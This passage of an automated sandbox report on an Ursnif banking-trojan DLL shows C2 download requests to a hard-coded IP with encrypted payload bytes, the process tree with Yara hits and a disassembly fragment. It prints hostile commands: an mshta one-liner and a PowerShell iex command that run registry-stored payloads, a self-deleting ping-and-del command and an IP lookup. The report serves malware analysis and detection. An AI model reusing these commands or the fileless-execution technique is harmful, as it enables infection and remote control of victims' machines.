                        May 25, 2022 11:27:27.011665106 CEST1443OUTGET /drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco/TjSDtFakSde/soGhjhBV5Tb5mX/q7nM_2FDyGsXlD3E3A4fe/_2ByGCIGrgekC2k4/_2BIghzEoEtICMG/eMdl_2FVYz1Gzr3rXb/6bQxvF882/0gJazcAIQC6vmyI4DEnR/k0LRXXmFX8YlpSLVUNq/6DaeywiN2GwHaJFGl8Ik7G/m9UBKgfO4ybSV/fnhYeS0x/hab1JQvgZCtDWyU/A.jlk HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 176.10.119.68
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        May 25, 2022 11:27:27.299287081 CEST1444INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 25 May 2022 09:27:27 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 238736
                        Connection: keep-alive
                        Pragma: public
                        Accept-Ranges: bytes
                        Expires: 0
                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                        Content-Disposition: inline; filename="628df67f44836.bin"
                        Data Raw: 77 23 28 92 02 ab 89 1f 5f 83 9b 9c dd 81 51 65 54 10 d3 af 4b a6 45 ed 4e 1f a1 c3 01 69 7d 5a bf 5b 1e 82 db 9c 68 a5 6c 5f b0 75 f6 0f b7 c6 a1 bd 5b 3a a6 23 97 c6 03 43 dd 6d c5 b0 87 f4 4d 2f 4b 42 12 50 ad 5d dc 48 86 7c 01 77 de d8 da aa f9 03 76 23 01 98 69 2c 89 0d d3 12 46 ac 39 36 aa 08 9a ea 7b a2 bb dc a7 78 26 04 8f 03 9d 87 34 1c aa 22 b0 6e 13 c3 27 44 5f c7 24 c4 22 e2 5b 96 27 30 31 bb 1b 43 2a 2b e9 3d ff bf 61 0c 7f ea 6f 0e 70 66 5a db cb ba d0 e3 0b ba 9e 5b a1 9b a4 95 7b 3a af ed 6f 61 0b 44 d3 2f c6 1e 90 51 c3 c1 c5 89 c2 6d 83 89 b6 90 00 46 d8 4f 01 66 2b 12 85 9c 8f d3 8f 99 d3 46 32 cb 96 9a 6b dd cf fe 1c 68 56 94 4b 48 55 a4 e6 cf 41 29 29 d6 3f 70 a3 26 e9 4e 34 40 ee c9 1d 0e 80 a9 ee c7 7a 15 78 bb bf d4 ec 56 96 fc b3 5d f9 a6 3e 05 30 4f 9f 5c 66 3e 5d e6 1d c5 5a 9c 9d 23 2f b4 5d 1f b9 cd 29 a3 ad f1 1a cb e2 ab f1 81 3d 6d 7a 1d 3e 8a a3 3b e9 fb 87 8f fc 55 17 a1 b6 0c 89 45 2a 96 0b 51 b7 4d f6 46 12 eb 91 18 82 15 7a cf 3a 6f 8e 28 7e ff db 55 bb 2e f7 9c 64 d4 da c5 c4 bb cb 89 cb 43 9f dc 7c 48 7a e6 2d 12 da 8c f4 44 f2 d1 08 29 69 75 0e 2d b9 ce f8 bb 06 26 10 21 0c c0 5e 42 85 6b 23 78 75 ec 94 8a 35 30 17 2d 5c 3c 93 2f 93 f9 96 23 1c f8 b6 84 ef ea 0c aa ad 1c 54 4f ed f5 0e 13 b0 3c cf 20 9a e4 46 5f c4 1d ea 00 d9 51 80 9f e6 4a b6 f2 68 bb 5b dd 53 ba eb d3 26 db 92 4a d0 73 5e 9b 1b 33 dc ab 4e 0b 55 13 81 ae fd 77 49 bc 01 ec 4b f9 09 ea 60 dd ea 46 2a 25 13 25 b3 bb 18 3c 3f 70 76 5a 9a 93 33 45 46 3f f0 c7 5b 9d a3 49 72 e5 8c 25 f1 cf f0 a6 dd ce 07 77 b5 9f 3e ea fc 4e 8c af f2 8c 21 b5 b6 7f d7 66 a5 79 fd 81 e3 a0 dd 10 04 59 d0 1c 92 2d bc 1f 62 e4 f2 00 73 91 bc 71 bc 20 06 ce 41 6a 6a 9a ee b9 fa 54 72 92 00 0c 49 27 e1 ba f1 5c 1c 06 eb 35 1a 00 45 db e4 31 ab 88 96 b0 ff 26 89 2d fc c8 31 1b 64 18 49 7a 9c 1f 31 8a 99 ed 74 76 f7 46 43 91 5f 2b e5 a4 4f 81 43 83 2f 2b f0 58 b3 e7 26 b1 48 31 fd 47 12 51 d2 9f 37 4a cb b3 44 f1 c1 1d 0d 0d c0 ed e1 ba b1 e7 f8 a4 7e d5 9b c0 fb cc 8e db fd 21 90 fa 1b 7c 17 b9 00 5a 3f 65 0c 07 23 c6 2d 31 69 87 ad 3d 0c d1 dc 5d 1b da 7a 19 1d e9 8f 0c 84 2d b7 76 f3 12 78 41 32 32 7c d9 b9 67 bd 09 af d5 eb 22 86 ce 7a eb 59 f5 4c fe 59 7e b5 5e 72 9c 41 b3 0d b0 61 27 61 69 ce 8f 3d e6 89 c1 3e 80 d4 bf 05 80 c9 5c 15 2e b0 d1 89 c8 1a 18 8b e9 a0 14 1f 38 52 13 2f 4e 97 88 34 65 1a 1c a3 c7 03 94 1c fd f5 00 d4 0c 66 1b ff bc 33 3a ea 99 93 06 2f a1 af 76 09 dd 35 58 e4 b5 16 87 6a f1 a5 f4 46 8e 6f 0e 91 42 b5 f9 90 ee 4b b8 55 38 76 ad 9e 59 2a 4f 47 b6 a1 a7 88 91 de 66 63 c5 1a c6 b9 f5 2d 71 e2 34 af db 56 7a 7e 08 b2 e1 3d 45 1e b1 d2 f4 be ff e0 ca 97 16 6d d7 ac fa 3d d9 dd 2b 98 8c 30 d8 d8 da f5 6f 43 2a c1 e2 39 58 57 5c f3 84 d2 8a fc 41 e8 b6 86 b5 d6 a9 cc 11 26 e2 5c 78 11 68 89 b8 d7 de 59 36 54 af e2 df ca 98 1e bc cf 75 02 7b 79 f6 a2 6e 13 90 b1 92 fc b3 ce a4 e2 34 91 55 9e fa 3b 0f 72 ab a2 4d 99 44 12 d5 e9 35 3f 40 50 46 79 d5 46 6d f3 1c db ef 73 2a 9e 2e a3 e6 41 21 e8 98 b1 58 a4 50 23 08 6f 7c 86 1c 56
                        Data Ascii: w#(_QeTKENi}Z[hl_u[:#CmM/KBP]H|wv#i,F96{x&4"n'D_$"['01C*+=aopfZ[{:oaD/QmFOf+F2khVKHUA))?p&N4@zxV]>0O\f>]Z#/])=mz>;UE*QMFz:o(~U.dC|Hz-D)iu-&!^Bk#xu50-\</#TO< F_QJh[S&Js^3NUwIK`F*%%<?pvZ3EF?[Ir%w>N!fyY-bsq AjjTrI'\5E1&-1dIz1tvFC_+OC/+X&H1GQ7JD~!|Z?e#-1i=]z-vxA22|g"zYLY~^rAa'ai=>\.8R/N4ef3:/v5XjFoBKU8vY*OGfc-q4Vz~=Em=+0oC*9XW\A&\xhY6Tu{yn4U;rMD5?@PFyFms*.A!XP#o|V
                        May 25, 2022 11:27:28.182548046 CEST1696OUTGET /drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB9pAoQo46tq53qB/yLUp2d5T9/j5s74YMStQa0vycAYVnz/i1_2BT1sbtGbsqmiKYJ/utxS2UAD48D_2FhKmTNhPj/C7HmcyJhh_2BI/RoK5qxzW/AONvbwwgZ6joXACVCUjXkBm/TrT5RUjDbT/JqnBRntI67DVKvl4U/zabjaRP4H3Fa/y7F2cIC4htT/NfLmrAWL7x6jSO/onSOjeHvFKi2HNfNhR_2F/KXsh6.jlk HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 176.10.119.68
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        May 25, 2022 11:27:28.475930929 CEST1698INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 25 May 2022 09:27:28 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1870
                        Connection: keep-alive
                        Pragma: public
                        Accept-Ranges: bytes
                        Expires: 0
                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                        Content-Disposition: inline; filename="628df6806e3d7.bin"
                        Data Raw: 16 73 69 31 09 06 6d 67 f0 e8 32 67 f7 0a 83 93 06 b9 df f8 37 51 1c 9d 9c 07 14 8f dc 5f 0c a3 1b 40 e9 a6 4f 90 34 e9 29 61 44 14 68 59 01 07 9d 75 5f 14 0d 89 33 23 dc 16 33 c5 a1 b7 2a 2b 04 69 ac be 28 5a 15 ed 24 be 2e 0a d4 54 44 07 1c 3c a1 5f 82 95 2b ec 34 ec ff 8e 52 c3 14 cb 86 87 b4 22 9b 54 47 47 e2 b0 56 01 6f 6f ee 38 14 2f 39 e9 c3 5e b7 d2 86 a1 f7 28 2e 2b bc 8f 66 4a 99 ea 61 ce 3d eb 59 2b 32 ba 1f 6d 95 cd 1a 43 93 dd b1 e6 b8 a6 fe 00 03 2d 11 b4 6a 10 e7 19 e4 3f f5 bf 36 04 79 00 58 c4 d0 12 4c e0 35 90 db c0 87 eb 8a a8 93 2b a7 7c cf f0 68 31 3b 31 68 d3 d7 e9 64 1f 3e bf 79 bc 42 80 b8 c0 b0 c9 5a 23 dd 78 10 86 f8 30 44 87 ba 6c 75 5c d2 80 bd c3 14 03 9f 17 fd f7 f0 4a a6 4f da c2 53 be e6 99 70 40 bd a6 a1 d9 12 51 8e e9 8d 99 45 7b cd fd ba 10 b0 85 d3 0d cc 62 b0 82 02 8b d7 51 51 5c c7 7f 57 85 c7 1c 7d e8 4c c2 59 39 c7 f0 6d 72 2a 86 ef a4 4e c8 bc f0 c3 44 f1 e7 b7 d4 6a b1 c0 5d a0 f6 06 06 86 79 68 a0 04 75 95 68 64 35 a7 2b 10 c3 89 9b 92 05 4f a9 16 a1 6e a4 5b 65 f3 a0 d3 ee 2a 5f a7 a2 51 72 0f 3d 08 fe da b8 eb 54 5d 8b a1 4d af 3b ae a8 29 d1 fe 8f e8 ae b8 0e 78 84 1e f4 78 5d 35 39 2d 2b 9d a4 cd 46 ae a1 68 ea 17 21 0c 5b 39 91 53 97 61 5d af 25 af 50 60 48 02 fa 0d 74 fa de 26 e9 9b 15 5f 12 6c bd 24 fe 44 c8 bc 86 b6 34 a6 35 f5 52 c2 e9 d1 ca af 12 31 9a 6b aa a0 7a 79 95 b6 1e 8b 83 29 b7 b2 85 18 5d 31 3c 0b 29 f4 1c ea a0 d9 d9 84 d3 c5 4a 7f 11 44 20 e2 1e c4 27 8d 17 5a 5f a1 e8 1e cb 8f ab 3f a9 9e 2f dd 48 35 0b 41 9e 48 8a 4c 9b 15 1a d4 43 66 80 ca 89 34 a5 de b0 d5 fb 6c 45 30 ee 1b 22 3f 5e 42 ff 82 a5 97 e5 c5 d5 41 6e 55 ff f7 70 a9 ae da 49 ed fb c3 40 18 37 db 1e 14 0b 72 0c ca 7e 17 bc 5f ab ab 3f 50 8f 71 10 b8 94 56 5a 37 6e 4b 94 31 8c aa 32 dc c2 5a d1 67 8d 1c b4 f9 8b 51 e2 c2 3c 19 8b c5 ff 49 28 68 17 97 6e 26 73 0e 2b 97 a3 4d 77 5a 3e 92 19 b3 d7 5c a1 ec e4 cb 05 30 73 ee 02 04 30 fa e3 6e 87 78 20 2d c1 4a 06 0e 8e e6 fc 00 08 5e e2 a7 fe 72 4c d2 b7 4a 82 1e 37 d3 b4 6a ae b7 d0 27 2a 31 c9 22 03 9e f0 6d a1 8c f9 47 3e f2 d8 98 93 bb 3c 16 ae f6 25 f2 9b 91 e3 dc 57 df 9d cf a5 28 4f 75 c7 a7 c4 81 2f fc 7f 4a a1 df 87 68 bc f7 66 c1 2c 48 91 ce 0e 96 f9 68 1f a5 66 36 3b 39 14 02 be 06 aa aa b6 60 70 d6 fe 13 eb 16 ca 2f 1c 81 b6 e2 1d 04 1e 2e 53 4c 94 46 f8 56 ed 5e fd 3d 48 cd 87 b7 04 0a 31 b5 9e 3a f4 e8 45 30 8b fd 23 a4 01 8a 20 6a ae 83 02 f6 26 81 38 97 69 db 72 e2 83 c8 13 a4 38 f3 04 bb f6 53 a7 62 04 1d ed 09 6b 32 6e ec 8a 2c 93 81 78 90 73 16 0d 4e e5 b0 98 c1 33 fd 26 a6 07 7d e5 72 41 30 5c 00 ff 8a b7 2f 96 71 b6 f9 7b 8f 67 7d a1 cd ed 16 4d 16 cc a1 d6 9f c2 08 5b 62 ed c9 01 1a 4a 0b 71 72 be 28 be eb 5d ea 9b 23 60 bb 90 51 33 ea 0f e3 f6 5c 11 d0 4e 7f f2 69 49 8f 45 fa 88 86 36 3d 00 f8 ca 46 9c 18 c5 e3 38 2a a5 b4 04 f4 66 f6 29 cb ce 7b 91 f1 cd a4 e3 14 4f 52 ac 7f 45 d7 4b c5 58 40 43 98 c4 44 6e 78 13 b7 d8 84 35 8e 32 af b6 ff b0 78 97 60 91 1b 75 84 fd d8 4c d2 b2 32 2c 87 b3 18 e3 fc 42 2c 52 90 26 be 18 ba 3b 3c cd e8 f2 d1
                        Data Ascii: si1mg2g7Q_@O4)aDhYu_3#3*+i(Z$.TD<_+4R"TGGVoo8/9^(.+fJa=Y+2mC-j?6yXL5+|h1;1hd>yBZ#x0Dlu\JOSp@QE{bQQ\W}LY9mr*NDj]yhuhd5+On[e*_Qr=T]M;)xx]59-+Fh![9Sa]%P`Ht&_l$D45R1kzy)]1<)JD 'Z_?/H5AHLCf4lE0"?^BAnUpI@7r~_?PqVZ7nK12ZgQ<I(hn&s+MwZ>\0s0nx -J^rLJ7j'*1"mG><%W(Ou/Jhf,Hhf6;9`p/.SLFV^=H1:E0# j&8ir8Sbk2n,xsN3&}rA0\/q{g}M[bJqr(]#`Q3\NiIE6=F8*f){OREKX@CDnx52x`uL2,B,R&;<


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:11:26:33
                        Start date:25/05/2022
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll"
                        Imagebase:0xc10000
                        File size:116736 bytes
                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:1
                        Start time:11:26:33
                        Start date:25/05/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1
                        Imagebase:0x1190000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:3
                        Start time:11:26:34
                        Start date:25/05/2022
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1
                        Imagebase:0x1020000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.324102664.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.323570193.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.505479603.0000000004B79000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.375616313.000000000509C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.323251316.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.508865065.0000000004F1F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.373340776.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322813142.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.324135232.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322932603.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.370749098.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.323857679.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.323438533.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.373077205.000000000519A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.373165051.0000000005219000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high

                        General

                        Target ID:4
                        Start time:11:26:35
                        Start date:25/05/2022
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 272
                        Imagebase:0xb70000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:6
                        Start time:11:26:41
                        Start date:25/05/2022
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 408
                        Imagebase:0xb70000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:8
                        Start time:11:26:46
                        Start date:25/05/2022
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 436
                        Imagebase:0xb70000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:24
                        Start time:11:27:34
                        Start date:25/05/2022
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cwbm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cwbm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                        Imagebase:0x7ff6c1160000
                        File size:14848 bytes
                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:25
                        Start time:11:27:37
                        Start date:25/05/2022
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                        Imagebase:0x7ff6ba650000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high

                        General

                        Target ID:26
                        Start time:11:27:38
                        Start date:25/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff647620000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:28
                        Start time:11:27:52
                        Start date:25/05/2022
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.cmdline
                        Imagebase:0x7ff6fcb60000
                        File size:2739304 bytes
                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        General

                        Target ID:29
                        Start time:11:27:55
                        Start date:25/05/2022
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBB61.tmp" "c:\Users\user\AppData\Local\Temp\rn2v1u0v\CSCE8729092494447E68BAFD2B3DE7C4FE.TMP"
                        Imagebase:0x7ff7a1d50000
                        File size:47280 bytes
                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:30
                        Start time:11:27:55
                        Start date:25/05/2022
                        Path:C:\Windows\System32\control.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\control.exe -h
                        Imagebase:0x7ff620e10000
                        File size:117760 bytes
                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000000.449708876.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000000.447845466.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000000.446537800.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                        General

                        Target ID:32
                        Start time:11:28:01
                        Start date:25/05/2022
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.cmdline
                        Imagebase:0x7ff6fcb60000
                        File size:2739304 bytes
                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        General

                        Target ID:33
                        Start time:11:28:04
                        Start date:25/05/2022
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDBAB.tmp" "c:\Users\user\AppData\Local\Temp\0rxpcrxp\CSC81748258BEC6426288BE9680C960B04E.TMP"
                        Imagebase:0x7ff7a1d50000
                        File size:47280 bytes
                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:34
                        Start time:11:28:09
                        Start date:25/05/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff6f3b00000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:38
                        Start time:11:28:24
                        Start date:25/05/2022
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\zs5n5sI6N2.dll
                        Imagebase:0x7ff7bb450000
                        File size:273920 bytes
                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:39
                        Start time:11:28:29
                        Start date:25/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff647620000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:40
                        Start time:11:28:31
                        Start date:25/05/2022
                        Path:C:\Windows\System32\PING.EXE
                        Wow64 process (32bit):false
                        Commandline:ping localhost -n 5
                        Imagebase:0x7ff7532f0000
                        File size:21504 bytes
                        MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:41
                        Start time:11:28:43
                        Start date:25/05/2022
                        Path:C:\Windows\System32\RuntimeBroker.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                        Imagebase:0x7ff6b45b0000
                        File size:99272 bytes
                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Target ID:43
                        Start time:11:29:19
                        Start date:25/05/2022
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):
                        Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1759.bi1"
                        Imagebase:
                        File size:273920 bytes
                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:9.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:14
                          Total number of Limit Nodes:2
                          execution_graph 274 401520 275 40152c 274->275 279 401541 274->279 277 401567 275->277 283 401500 275->283 280 40152c 279->280 281 401567 279->281 282 401500 GetBinaryTypeA 280->282 282->279 286 40ba80 283->286 289 401360 286->289 288 401509 288->275 290 401379 289->290 291 401469 GetBinaryTypeA 290->291 292 4013a3 290->292 291->292 292->288

                          Callgraph

                          Executed Functions

                          Function 00401360 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 401360-401398 call 40baa0 * 2 5 4014e8-4014ff 0->5 6 40139e-4014c3 0->6 6->5 8 4014c5 6->8 11 401454 8->11 12 40145b-401467 8->12 13 401469-4014b0 GetBinaryTypeA 11->13 12->13 14 4014ca-4014e0 12->14 15 4013a3-40140f call 40c1c0 13->15 16 4014b6 13->16 17 401456 14->17 18 4014e6 14->18 15->5 16->17 17->5 18->13
                          APIs
